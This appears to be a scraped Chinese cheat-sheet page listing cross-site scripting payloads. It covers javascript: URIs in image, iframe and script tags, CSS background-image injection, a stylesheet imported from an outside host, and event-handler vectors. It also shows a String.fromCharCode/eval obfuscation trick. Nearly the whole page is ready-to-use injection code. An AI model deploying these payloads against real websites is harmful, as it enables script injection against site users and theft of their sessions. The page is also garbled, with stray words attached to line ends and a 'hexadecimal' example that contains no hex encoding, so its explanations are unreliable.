常見的javascript跨站

  

第一類:javascript

<img src=javascript:alert() />css

<iframe src=javascript:alert()></iframe>java

<script src=javascript:alert()></script>xss

第二類:網站

<div style=background-image:url(javascript:alert())>url

<img style=background-image:url(javascript:alert())>seo

<b style=background-image:url(javascript:alert())>圖片

用STYLE標籤引用其餘網站上的css文件ip

<STYLE>@import'http://xxx.xom/xss.css';</STYLE>iframe

css文件裏包含跨站程序

body{

background-image:url('javascript:alert();');
}

第三類:

<table background=javascript:alert()></table>

<body background=javascript:alert()></body>

第四類:

<div onmouseenter=alert()>鼠標進入本區域執行Javascript</div>

<div onmouseleave=alert()>鼠標離開本區域執行Javascript</div>

<div onmousewheel=alert()>鼠標在選區滾輪時執行Javascript</div>

<div contentEditable="true" onfocusin=alert()>得到焦點執行Javascript</div>

<div contentEditable="true" onfocusout=alert()>失去焦點執行Javascript</div>

<marquee onstart=alert()>每次顯示滾動內容執行Javascript</marquee>

<img src="" onerror=alert('加載圖片錯誤執行代碼')>

<img src="" onclick=alert('單擊圖片執行代碼')>

<img onmouseover=alert('鼠標通過圖片執行代碼')>

 

<img style=background-image:url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,41)))>

將要執行的代碼「alert()」轉換爲十進制的ASCII碼,其間用逗號隔開,再用String.fromCharCode解碼,最後用eval執行

 

還能夠進行十六進制的處理:

<img style=background-image:url(javascript:alert()>

相關文章
相關標籤/搜索